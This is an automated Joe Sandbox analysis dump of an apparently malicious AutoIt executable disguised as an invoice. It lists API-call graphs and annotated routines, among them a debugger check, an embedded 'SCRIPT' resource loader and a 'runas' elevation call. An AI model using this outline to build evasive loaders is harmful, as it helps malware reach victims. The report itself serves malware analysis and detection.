47 API calls 
__getptd_noexit 93188->93281 93191 21b027 93286 217c0e 47 API calls __getptd_noexit 93191->93286 93207 21a8ed 93192->93207 93193 21af82 __fcloseall 93193->93145 93196 21b02f 93287 216e10 8 API calls _memcpy_s 93196->93287 93197 21afc5 93199 21afd8 93197->93199 93200 21afeb 93197->93200 93216 21b043 93199->93216 93282 217c0e 47 API calls __getptd_noexit 93200->93282 93203 21aff0 93283 217bda 47 API calls __getptd_noexit 93203->93283 93204 21afe4 93284 21b01a LeaveCriticalSection __unlock_fhandle 93204->93284 93208 21a8f9 __fcloseall 93207->93208 93209 21a946 EnterCriticalSection 93208->93209 93210 217cf4 __lock 47 API calls 93208->93210 93211 21a96c __fcloseall 93209->93211 93212 21a91d 93210->93212 93211->93197 93213 21a928 InitializeCriticalSectionAndSpinCount 93212->93213 93214 21a93a 93212->93214 93213->93214 93288 21a970 LeaveCriticalSection _doexit 93214->93288 93217 21b050 __ftell_nolock 93216->93217 93218 21b08d 93217->93218 93219 21b0ac 93217->93219 93250 21b082 93217->93250 93298 217bda 47 API calls __getptd_noexit 93218->93298 93222 21b105 93219->93222 93223 21b0e9 93219->93223 93233 21b11c 93222->93233 93304 21f82f 49 API calls 3 library calls 93222->93304 93301 217bda 47 API calls __getptd_noexit 93223->93301 93224 21b86b 93224->93204 93225 21b092 93299 217c0e 47 API calls __getptd_noexit 93225->93299 93228 21b0ee 93302 217c0e 47 API calls __getptd_noexit 93228->93302 93230 21b099 93300 216e10 8 API calls _memcpy_s 93230->93300 93289 223bf2 93233->93289 93235 21b12a 93236 21b44b 93235->93236 93305 217a0d 47 API calls 2 library calls 93235->93305 93238 21b463 93236->93238 93239 21b7b8 WriteFile 93236->93239 93237 21b0f5 93303 216e10 8 API calls _memcpy_s 93237->93303 93242 21b55a 93238->93242 93248 21b479 93238->93248 93243 21b7e1 GetLastError 93239->93243 93252 21b410 93239->93252 93254 21b565 93242->93254 93256 21b663 93242->93256 93243->93252 93244 21b150 GetConsoleMode 93244->93236 93246 21b189 93244->93246 93245 21b81b 93245->93250 93310 217c0e 47 
API calls __getptd_noexit 93245->93310 93246->93236 93247 21b199 GetConsoleCP 93246->93247 93247->93252 93278 21b1c2 93247->93278 93248->93245 93249 21b4e9 WriteFile 93248->93249 93249->93243 93255 21b526 93249->93255 93312 21a70c 93250->93312 93252->93245 93252->93250 93253 21b7f7 93252->93253 93258 21b812 93253->93258 93259 21b7fe 93253->93259 93254->93245 93260 21b5de WriteFile 93254->93260 93255->93248 93255->93252 93266 21b555 93255->93266 93256->93245 93261 21b6d8 WideCharToMultiByte 93256->93261 93257 21b843 93311 217bda 47 API calls __getptd_noexit 93257->93311 93309 217bed 47 API calls 3 library calls 93258->93309 93307 217c0e 47 API calls __getptd_noexit 93259->93307 93260->93243 93265 21b62d 93260->93265 93261->93243 93272 21b71f 93261->93272 93265->93252 93265->93254 93265->93266 93266->93252 93267 21b803 93308 217bda 47 API calls __getptd_noexit 93267->93308 93268 21b727 WriteFile 93270 21b77a GetLastError 93268->93270 93268->93272 93270->93272 93272->93252 93272->93256 93272->93266 93272->93268 93273 225884 WriteConsoleW CreateFileW __chsize_nolock 93276 21b2f6 93273->93276 93274 2240f7 59 API calls __chsize_nolock 93274->93278 93275 21b28f WideCharToMultiByte 93275->93252 93277 21b2ca WriteFile 93275->93277 93276->93243 93276->93252 93276->93273 93276->93278 93279 21b321 WriteFile 93276->93279 93277->93243 93277->93276 93278->93252 93278->93274 93278->93275 93278->93276 93306 211688 57 API calls __isleadbyte_l 93278->93306 93279->93243 93279->93276 93280->93188 93281->93193 93282->93203 93283->93204 93284->93193 93285->93191 93286->93196 93287->93193 93288->93209 93290 223c0a 93289->93290 93291 223bfd 93289->93291 93293 217c0e _memcpy_s 47 API calls 93290->93293 93295 223c16 93290->93295 93292 217c0e _memcpy_s 47 API calls 93291->93292 93294 223c02 93292->93294 93296 223c37 93293->93296 93294->93235 93295->93235 93297 216e10 _memcpy_s 8 API calls 93296->93297 93297->93294 93298->93225 93299->93230 93300->93250 93301->93228 93302->93237 93303->93250 
93304->93233 93305->93244 93306->93278 93307->93267 93308->93250 93309->93250 93310->93257 93311->93250 93313 21a714 93312->93313 93314 21a716 IsProcessorFeaturePresent 93312->93314 93313->93224 93316 2237b0 93314->93316 93317 22375f ___raise_securityfailure 5 API calls 93316->93317 93318 223893 93317->93318 93318->93224 93319->93154 93320->93156 93343 21aba4 93321->93343 93323 21eb00 93356 21ab1e 48 API calls 2 library calls 93323->93356 93324 21eaaa 93324->93323 93326 21aba4 __lseeki64_nolock 47 API calls 93324->93326 93335 21eade 93324->93335 93330 21ead5 93326->93330 93327 21aba4 __lseeki64_nolock 47 API calls 93331 21eaea CloseHandle 93327->93331 93328 21eb08 93329 21eb2a 93328->93329 93357 217bed 47 API calls 3 library calls 93328->93357 93329->93178 93333 21aba4 __lseeki64_nolock 47 API calls 93330->93333 93331->93323 93334 21eaf6 GetLastError 93331->93334 93333->93335 93334->93323 93335->93323 93335->93327 93336->93163 93337->93168 93338->93178 93339->93168 93340->93166 93341->93171 93342->93168 93344 21abc4 93343->93344 93345 21abaf 93343->93345 93349 21abe9 93344->93349 93360 217bda 47 API calls __getptd_noexit 93344->93360 93358 217bda 47 API calls __getptd_noexit 93345->93358 93348 21abb4 93359 217c0e 47 API calls __getptd_noexit 93348->93359 93349->93324 93350 21abf3 93361 217c0e 47 API calls __getptd_noexit 93350->93361 93353 21abbc 93353->93324 93354 21abfb 93362 216e10 8 API calls _memcpy_s 93354->93362 93356->93328 93357->93329 93358->93348 93359->93353 93360->93350 93361->93354 93362->93353 93364 1f9384 93363->93364 93365 1f9380 93363->93365 93366 264cbd __i64tow 93364->93366 93367 1f9398 93364->93367 93368 264bbf 93364->93368 93376 1f93b0 __itow Mailbox _wcscpy 93364->93376 93365->92966 93469 21172b 80 API calls 3 library calls 93367->93469 93369 264ca5 93368->93369 93370 264bc8 93368->93370 93470 21172b 80 API calls 3 library calls 93369->93470 93375 264be7 93370->93375 93370->93376 93373 20f4ea 48 API calls 93374 1f93ba 93373->93374 
93374->93365 93377 1fce19 48 API calls 93374->93377 93378 20f4ea 48 API calls 93375->93378 93376->93373 93377->93365 93379 264c04 93378->93379 93380 20f4ea 48 API calls 93379->93380 93381 264c2a 93380->93381 93381->93365 93382 1fce19 48 API calls 93381->93382 93382->93365 93471 1f4214 93383->93471 93388 264f73 93390 1f4252 84 API calls 93388->93390 93389 1f41d4 LoadLibraryExW 93481 1f4291 93389->93481 93392 264f7a 93390->93392 93395 1f4291 3 API calls 93392->93395 93398 264f82 93395->93398 93396 1f41fb 93397 1f4207 93396->93397 93396->93398 93399 1f4252 84 API calls 93397->93399 93507 1f44ed 93398->93507 93401 1f420c 93399->93401 93401->92973 93401->92975 93404 264fa9 93515 1f4950 93404->93515 93690 211e46 93407->93690 93411 236918 _wcschr __ftell_nolock 93410->93411 93412 211dfc __wsplitpath 47 API calls 93411->93412 93415 23692e _wcscat _wcscpy 93411->93415 93413 23695d 93412->93413 93414 211dfc __wsplitpath 47 API calls 93413->93414 93414->93415 93415->92994 93417 23bfb1 __ftell_nolock 93416->93417 93418 20f4ea 48 API calls 93417->93418 93419 23c00e 93418->93419 93420 1f47b7 48 API calls 93419->93420 93421 23c018 93420->93421 93422 23bdb4 GetSystemTimeAsFileTime 93421->93422 93423 23c023 93422->93423 93424 1f4517 83 API calls 93423->93424 93425 23c036 _wcscmp 93424->93425 93426 23c107 93425->93426 93427 23c05a 93425->93427 93428 23c56d 94 API calls 93426->93428 93733 23c56d 93427->93733 93444 23c0d3 _wcscat 93428->93444 93431 211dfc __wsplitpath 47 API calls 93437 23c088 _wcscat _wcscpy 93431->93437 93432 1f44ed 64 API calls 93433 23c12c 93432->93433 93434 1f44ed 64 API calls 93433->93434 93436 23c13c 93434->93436 93435 23c110 93435->93000 93438 1f44ed 64 API calls 93436->93438 93439 211dfc __wsplitpath 47 API calls 93437->93439 93440 23c157 93438->93440 93439->93444 93441 1f44ed 64 API calls 93440->93441 93442 23c167 93441->93442 93443 1f44ed 64 API calls 93442->93443 93445 23c182 93443->93445 93444->93432 93444->93435 93446 1f44ed 64 API calls 93445->93446 
93447 23c192 93446->93447 93448 1f44ed 64 API calls 93447->93448 93449 23c1a2 93448->93449 93450 1f44ed 64 API calls 93449->93450 93451 23c1b2 93450->93451 93716 23c71a GetTempPathW GetTempFileNameW 93451->93716 93453 23c1be 93454 213499 117 API calls 93453->93454 93456 23c1cf 93454->93456 93455 2135e4 __fcloseall 83 API calls 93457 23c294 93455->93457 93456->93435 93458 1f44ed 64 API calls 93456->93458 93465 23c289 93456->93465 93717 212aae 93456->93717 93457->93435 93459 23c342 CopyFileW 93457->93459 93460 23c2b8 93457->93460 93458->93456 93459->93435 93464 23c32d 93459->93464 93739 23b965 93460->93739 93464->93435 93730 23c6d9 CreateFileW 93464->93730 93465->93455 93466->92963 93467->92985 93468->92991 93469->93376 93470->93376 93520 1f4339 93471->93520 93474 1f423c 93476 1f41bb 93474->93476 93477 1f4244 FreeLibrary 93474->93477 93478 213499 93476->93478 93477->93476 93528 2134ae 93478->93528 93480 1f41c8 93480->93388 93480->93389 93607 1f42e4 93481->93607 93484 1f42b8 93486 1f41ec 93484->93486 93487 1f42c1 FreeLibrary 93484->93487 93488 1f4380 93486->93488 93487->93486 93489 20f4ea 48 API calls 93488->93489 93490 1f4395 93489->93490 93615 1f47b7 93490->93615 93492 1f43a1 _memcpy_s 93493 1f43dc 93492->93493 93494 1f4499 93492->93494 93495 1f44d1 93492->93495 93496 1f4950 57 API calls 93493->93496 93618 1f406b CreateStreamOnHGlobal 93494->93618 93629 23c750 93 API calls 93495->93629 93502 1f43e5 93496->93502 93499 1f44ed 64 API calls 93499->93502 93501 1f4479 93501->93396 93502->93499 93502->93501 93503 264ed7 93502->93503 93624 1f4517 93502->93624 93504 1f4517 83 API calls 93503->93504 93505 264eeb 93504->93505 93506 1f44ed 64 API calls 93505->93506 93506->93501 93508 1f44ff 93507->93508 93511 264fc0 93507->93511 93647 21381e 93508->93647 93512 23bf5a 93667 23bdb4 93512->93667 93514 23bf70 93514->93404 93516 1f495f 93515->93516 93517 265002 93515->93517 93672 213e65 93516->93672 93519 1f4967 93524 1f434b 93520->93524 93523 1f4321 LoadLibraryA GetProcAddress 
93523->93474 93525 1f422f 93524->93525 93526 1f4354 LoadLibraryA 93524->93526 93525->93474 93525->93523 93526->93525 93527 1f4365 GetProcAddress 93526->93527 93527->93525 93531 2134ba __fcloseall 93528->93531 93529 2134cd 93576 217c0e 47 API calls __getptd_noexit 93529->93576 93531->93529 93533 2134fe 93531->93533 93532 2134d2 93577 216e10 8 API calls _memcpy_s 93532->93577 93547 21e4c8 93533->93547 93536 213503 93537 213519 93536->93537 93538 21350c 93536->93538 93540 213543 93537->93540 93541 213523 93537->93541 93578 217c0e 47 API calls __getptd_noexit 93538->93578 93561 21e5e0 93540->93561 93579 217c0e 47 API calls __getptd_noexit 93541->93579 93546 2134dd __fcloseall @_EH4_CallFilterFunc@8 93546->93480 93548 21e4d4 __fcloseall 93547->93548 93549 217cf4 __lock 47 API calls 93548->93549 93555 21e4e2 93549->93555 93550 21e559 93586 2169d0 47 API calls __crtLCMapStringA_stat 93550->93586 93553 21e5cc __fcloseall 93553->93536 93554 21e560 93556 21e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 93554->93556 93559 21e552 93554->93559 93555->93550 93557 217d7c __mtinitlocknum 47 API calls 93555->93557 93555->93559 93584 214e5b 48 API calls __lock 93555->93584 93585 214ec5 LeaveCriticalSection LeaveCriticalSection _doexit 93555->93585 93556->93559 93557->93555 93581 21e5d7 93559->93581 93570 21e600 __wopenfile 93561->93570 93562 21e61a 93591 217c0e 47 API calls __getptd_noexit 93562->93591 93563 21e7d5 93563->93562 93567 21e838 93563->93567 93565 21e61f 93592 216e10 8 API calls _memcpy_s 93565->93592 93588 2263c9 93567->93588 93568 21354e 93580 213570 LeaveCriticalSection LeaveCriticalSection _fprintf 93568->93580 93570->93562 93570->93563 93593 21185b 59 API calls 2 library calls 93570->93593 93572 21e7ce 93572->93563 93594 21185b 59 API calls 2 library calls 93572->93594 93574 21e7ed 93574->93563 93595 21185b 59 API calls 2 library calls 93574->93595 93576->93532 93577->93546 93578->93546 93579->93546 93580->93546 93587 217e58 LeaveCriticalSection 
93581->93587 93583 21e5de 93583->93553 93584->93555 93585->93555 93586->93554 93587->93583 93596 225bb1 93588->93596 93590 2263e2 93590->93568 93591->93565 93592->93568 93593->93572 93594->93574 93595->93563 93599 225bbd __fcloseall 93596->93599 93597 225bcf 93598 217c0e _memcpy_s 47 API calls 93597->93598 93600 225bd4 93598->93600 93599->93597 93601 225c06 93599->93601 93603 216e10 _memcpy_s 8 API calls 93600->93603 93602 225c78 __wsopen_helper 110 API calls 93601->93602 93604 225c23 93602->93604 93606 225bde __fcloseall 93603->93606 93605 225c4c __wsopen_helper LeaveCriticalSection 93604->93605 93605->93606 93606->93590 93611 1f42f6 93607->93611 93610 1f42cc LoadLibraryA GetProcAddress 93610->93484 93612 1f42aa 93611->93612 93613 1f42ff LoadLibraryA 93611->93613 93612->93484 93612->93610 93613->93612 93614 1f4310 GetProcAddress 93613->93614 93614->93612 93616 20f4ea 48 API calls 93615->93616 93617 1f47c9 93616->93617 93617->93492 93619 1f4085 FindResourceExW 93618->93619 93623 1f40a2 93618->93623 93620 264f16 LoadResource 93619->93620 93619->93623 93621 264f2b SizeofResource 93620->93621 93620->93623 93622 264f3f LockResource 93621->93622 93621->93623 93622->93623 93623->93493 93625 1f4526 93624->93625 93628 264fe0 93624->93628 93630 213a8d 93625->93630 93627 1f4534 93627->93502 93629->93493 93631 213a99 __fcloseall 93630->93631 93632 213aa7 93631->93632 93634 213acd 93631->93634 93643 217c0e 47 API calls __getptd_noexit 93632->93643 93636 214e1c __lock_file 48 API calls 93634->93636 93635 213aac 93644 216e10 8 API calls _memcpy_s 93635->93644 93638 213ad3 93636->93638 93645 2139fe 81 API calls 4 library calls 93638->93645 93640 213ae2 93646 213b04 LeaveCriticalSection LeaveCriticalSection _fprintf 93640->93646 93642 213ab7 __fcloseall 93642->93627 93643->93635 93644->93642 93645->93640 93646->93642 93650 213839 93647->93650 93649 1f4510 93649->93512 93651 213845 __fcloseall 93650->93651 93652 213880 __fcloseall 93651->93652 93653 213888 93651->93653 93654 21385b 
_memset 93651->93654 93652->93649 93655 214e1c __lock_file 48 API calls 93653->93655 93663 217c0e 47 API calls __getptd_noexit 93654->93663 93657 21388e 93655->93657 93665 21365b 62 API calls 3 library calls 93657->93665 93658 213875 93664 216e10 8 API calls _memcpy_s 93658->93664 93661 2138a4 93666 2138c2 LeaveCriticalSection LeaveCriticalSection _fprintf 93661->93666 93663->93658 93664->93652 93665->93661 93666->93652 93670 21344a GetSystemTimeAsFileTime 93667->93670 93669 23bdc3 93669->93514 93671 213478 __aulldiv 93670->93671 93671->93669 93673 213e71 __fcloseall 93672->93673 93674 213e94 93673->93674 93675 213e7f 93673->93675 93677 214e1c __lock_file 48 API calls 93674->93677 93686 217c0e 47 API calls __getptd_noexit 93675->93686 93679 213e9a 93677->93679 93678 213e84 93687 216e10 8 API calls _memcpy_s 93678->93687 93688 213b0c 55 API calls 4 library calls 93679->93688 93682 213ea5 93689 213ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 93682->93689 93684 213eb7 93685 213e8f __fcloseall 93684->93685 93685->93519 93686->93678 93687->93685 93688->93682 93689->93684 93691 211e61 93690->93691 93694 211e55 93690->93694 93714 217c0e 47 API calls __getptd_noexit 93691->93714 93693 212019 93698 211e41 93693->93698 93715 216e10 8 API calls _memcpy_s 93693->93715 93694->93691 93704 211ed4 93694->93704 93709 219d6b 47 API calls _memcpy_s 93694->93709 93697 211fa0 93697->93691 93697->93698 93700 211fb0 93697->93700 93698->92988 93699 211f5f 93699->93691 93701 211f7b 93699->93701 93711 219d6b 47 API calls _memcpy_s 93699->93711 93713 219d6b 47 API calls _memcpy_s 93700->93713 93701->93691 93701->93698 93703 211f91 93701->93703 93712 219d6b 47 API calls _memcpy_s 93703->93712 93704->93691 93708 211f41 93704->93708 93710 219d6b 47 API calls _memcpy_s 93704->93710 93708->93697 93708->93699 93709->93704 93710->93708 93711->93701 93712->93698 93713->93698 93714->93693 93715->93698 93716->93453 93718 212aba __fcloseall 93717->93718 93719 212ad4 93718->93719 93720 212aec 
[Execution graph: call-graph node and edge listing (numeric node IDs such as 93718->93720 with function addresses and API-call counts), not reproduced. Recoverable information from the graph nodes:]

Windows API calls referenced in the graph nodes:
- Process, module and environment: GetCurrentProcess, TerminateProcess, GetProcessHeap, HeapAlloc, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStartupInfoW, GetModuleFileNameW, LoadLibraryA, GetProcAddress, FreeLibrary, GetVersionExW, GetSystemInfo, GetNativeSystemInfo, IsProcessorFeaturePresent, GetPEB (sandbox annotation), Sleep, CoInitialize
- Threads and synchronization: CreateThread, GetCurrentThreadId, TlsAlloc, TlsSetValue, InitializeCriticalSectionAndSpinCount, LeaveCriticalSection, InterlockedDecrement, SetTimer, KillTimer
- Memory: VirtualProtect
- Files and directories: GetStdHandle, GetFileType, CloseHandle, SetFileTime, GetSystemTimeAsFileTime, GetFullPathNameW, GetLongPathNameW, GetCurrentDirectoryW, SetCurrentDirectoryW, GetOpenFileNameW
- Registry: RegOpenKeyExW, RegQueryValueExW, RegCloseKey
- Debugger and exception handling: IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
- Window, shell and UI: RegisterWindowMessageW, DefWindowProcW, PostQuitMessage, CreatePopupMenu, MoveWindow, SetFocus, DestroyWindow, DeleteObject, Shell_NotifyIconW, MessageBoxA, SystemParametersInfoW, IsThemeActive, CharUpperBuffW, CharLowerBuffW

CRT and AutoIt runtime internals named in the graph nodes: __fcloseall, __lock_file, __filbuf, __flush, __flswbuf, _fprintf, __ftell_nolock, __tzset_nolock, __getptd_noexit, __calloc_crt, __calloc_impl, _free, _doexit, __cinit, __initterm_e, __RTC_Initialize, __wsetenvp, __wwincmdln, _wparse_cmdline, __IsNonwritableInCurrentImage, __initp_misc_cfltcvt_tab, ___raise_securityfailure, __crtLCMapStringA_stat, _W_store_winword, _memcpy_s, _memset, _strcat, _strlen, _wcscat, _wcscpy, _wcscmp, @_EH4_CallFilterFunc@8, and the "Mailbox" annotation.
95340 204525 61 API calls _memcpy_s 95338->95340 95340->95330 95341->95332 95342 1fef80 95343 203b70 331 API calls 95342->95343 95344 1fef8c 95343->95344

                                                              Control-flow Graph
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7b19b26dd6a8dc68c996d86a51cd90870e9790e567cf1c973f98aaf5819e8963
                                                              • Instruction ID: 844aef5381ef0b5ea3cc0fe6b6cc97c781a058005fb79ac662a8c1d52cb60310
                                                              • Opcode Fuzzy Hash: 7b19b26dd6a8dc68c996d86a51cd90870e9790e567cf1c973f98aaf5819e8963
                                                              • Instruction Fuzzy Hash: B2328A75A222298BDB268F14DC846E9B7F5FF5A310F1841D9E40AE7A81D7309ED0CF52

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,001F3AA3,?), ref: 001F3D45
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,001F3AA3,?), ref: 001F3D57
                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,002B1148,002B1130,?,?,?,?,001F3AA3,?), ref: 001F3DC8
                                                                • Part of subcall function 001F6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,001F3DEE,002B1148,?,?,?,?,?,001F3AA3,?), ref: 001F6471
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,001F3AA3,?), ref: 001F3E48
                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,002A28F4,00000010), ref: 00261CCE
                                                              • SetCurrentDirectoryW.KERNEL32(?,002B1148,?,?,?,?,?,001F3AA3,?), ref: 00261D06
                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0028DAB4,002B1148,?,?,?,?,?,001F3AA3,?), ref: 00261D89
                                                              • ShellExecuteW.SHELL32(00000000,?,?,?,?,001F3AA3), ref: 00261D90
                                                                • Part of subcall function 001F3E6E: GetSysColorBrush.USER32(0000000F), ref: 001F3E79
                                                                • Part of subcall function 001F3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 001F3E88
                                                                • Part of subcall function 001F3E6E: LoadIconW.USER32(00000063), ref: 001F3E9E
                                                                • Part of subcall function 001F3E6E: LoadIconW.USER32(000000A4), ref: 001F3EB0
                                                                • Part of subcall function 001F3E6E: LoadIconW.USER32(000000A2), ref: 001F3EC2
                                                                • Part of subcall function 001F3E6E: RegisterClassExW.USER32(?), ref: 001F3F30
                                                                • Part of subcall function 001F36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001F36E6
                                                                • Part of subcall function 001F36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001F3707
                                                                • Part of subcall function 001F36B8: ShowWindow.USER32(00000000,?,?,?,?,001F3AA3,?), ref: 001F371B
                                                                • Part of subcall function 001F36B8: ShowWindow.USER32(00000000,?,?,?,?,001F3AA3,?), ref: 001F3724
                                                                • Part of subcall function 001F4FFC: _memset.LIBCMT ref: 001F5022
                                                                • Part of subcall function 001F4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001F50CB
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                              • String ID: ()*$This is a third-party compiled AutoIt script.$runas
                                                              • API String ID: 438480954-3691733941
                                                              • Opcode ID: ce06e2a37d54ea3c59ea69e103e51523f775ff68174d5dc03fb1291fa5220e85
                                                              • Instruction ID: 6c32dd16a84ad46b855a23c8973e71d8f44af45e1fb6311db6fd3232cfa14f37
                                                              • Opcode Fuzzy Hash: ce06e2a37d54ea3c59ea69e103e51523f775ff68174d5dc03fb1291fa5220e85
                                                              • Instruction Fuzzy Hash: C7514530A2424CBACF11ABB8EC2AEFE7B799F25740F004264F71562193DB305669CB21

                                                              Control-flow Graph
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 0020DDEC
                                                              • GetCurrentProcess.KERNEL32(00000000,0028DC38,?,?), ref: 0020DEAC
                                                              • GetNativeSystemInfo.KERNELBASE(?,0028DC38,?,?), ref: 0020DF01
                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 0020DF0C
                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 0020DF1F
                                                              • GetSystemInfo.KERNEL32(?,0028DC38,?,?), ref: 0020DF29
                                                              • GetSystemInfo.KERNEL32(?,0028DC38,?,?), ref: 0020DF35
                                                              Similarity
                                                              • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                              • String ID:
                                                              • API String ID: 3851250370-0
                                                              • Opcode ID: a0a7fac470a07c6544c97ba65b9f1fb29085e31d13a267b41b825d5c5aa1963f
                                                              • Instruction ID: 1f7b2a4646ec2ce7c31173f12f7e8053d30edbf381734ff67bb80a3a8ab92c84
                                                              • Opcode Fuzzy Hash: a0a7fac470a07c6544c97ba65b9f1fb29085e31d13a267b41b825d5c5aa1963f
                                                              • Instruction Fuzzy Hash: 6B61F67182A385DFCF15CFA894C51E9BFB4AF29300B1989D8D8489F287C624C959CB65

                                                              Control-flow Graph
                                                              APIs
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,001F449E,?,?,00000000,00000001), ref: 001F407B
                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001F449E,?,?,00000000,00000001), ref: 001F4092
                                                              • LoadResource.KERNEL32(?,00000000,?,?,001F449E,?,?,00000000,00000001,?,?,?,?,?,?,001F41FB), ref: 00264F1A
                                                              • SizeofResource.KERNEL32(?,00000000,?,?,001F449E,?,?,00000000,00000001,?,?,?,?,?,?,001F41FB), ref: 00264F2F
                                                              • LockResource.KERNEL32(001F449E,?,?,001F449E,?,?,00000000,00000001,?,?,?,?,?,?,001F41FB,00000000), ref: 00264F42
                                                              Strings
                                                              Similarity
                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                              • String ID: SCRIPT
                                                              • API String ID: 3051347437-3967369404
                                                              • Opcode ID: 8be64e551f24bf07ccae1a52dc8b59020e860209a851f32bc21f184bd655e28f
                                                              • Instruction ID: 3e58fe607a861ec36203d6ef0456a42afd983494175ed7bc2aeee18588f870cb
                                                              • Opcode Fuzzy Hash: 8be64e551f24bf07ccae1a52dc8b59020e860209a851f32bc21f184bd655e28f
                                                              • Instruction Fuzzy Hash: FB117C70200705BFEB218B25EC48F677BB9EFC5B51F10422CF606962A1DF71EC419A20
                                                              Strings
                                                              Similarity
                                                              • API ID: Exception@8Throwstd::exception::exception
                                                              • String ID: @$ +$ +$ +
                                                              • API String ID: 3728558374-3489739628
                                                              • Opcode ID: 896964147efa02030fcd5b8718f4e4805f60c82106ee597d694d92477ed42d9c
                                                              • Instruction ID: f7d060d922e51dde6396d01405ddfff143f12c95c33cd008df4180eff56069a6
                                                              • Opcode Fuzzy Hash: 896964147efa02030fcd5b8718f4e4805f60c82106ee597d694d92477ed42d9c
                                                              • Instruction Fuzzy Hash: 3B72B170E2420ADFCF14EF94C485ABEB7B9EF44304F14805AED05AB292D771AE65CB91
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00262F49), ref: 00236CB9
                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00236CCA
                                                              • FindClose.KERNEL32(00000000), ref: 00236CDA
                                                              Similarity
                                                              • API ID: FileFind$AttributesCloseFirst
                                                              • String ID:
                                                              • API String ID: 48322524-0
                                                              • Opcode ID: 56a43469e6ede339ace81de8af1a66f6a89c6bfdeb8e5113a6656e615006cf90
                                                              • Instruction ID: c55b775afb082e8ab452aa3517134357919ed2a48e797102cc093cce2ea1577c
                                                              • Opcode Fuzzy Hash: 56a43469e6ede339ace81de8af1a66f6a89c6bfdeb8e5113a6656e615006cf90
                                                              • Instruction Fuzzy Hash: 95E048718255156783106778FC0D8E9777CDE0633AF504B17F579C11D0E7B0D95485E5
                                                              Strings
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: +
                                                              • API String ID: 3964851224-3708373374
                                                              • Opcode ID: 11c2dffca05b3c3adb4111076df2133eb3deea4569efdaaf1317bf3d6aa81327
                                                              • Instruction ID: b28a5681f9476bf015dd8885778186b8f30a6c9974b87971fd8b922244a951d2
                                                              • Opcode Fuzzy Hash: 11c2dffca05b3c3adb4111076df2133eb3deea4569efdaaf1317bf3d6aa81327
                                                              • Instruction Fuzzy Hash: CD928F70618341CFD724DF18C494B6AB7E9BF84308F14885DE98A8B3A2DB71ED95CB52
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001FE959
                                                              • timeGetTime.WINMM ref: 001FEBFA
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001FED2E
                                                              • TranslateMessage.USER32(?), ref: 001FED3F
                                                              • DispatchMessageW.USER32(?), ref: 001FED4A
                                                              • LockWindowUpdate.USER32(00000000), ref: 001FED79
                                                              • DestroyWindow.USER32 ref: 001FED85
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001FED9F
                                                              • Sleep.KERNEL32(0000000A), ref: 00265270
                                                              • TranslateMessage.USER32(?), ref: 002659F7
                                                              • DispatchMessageW.USER32(?), ref: 00265A05
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00265A19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
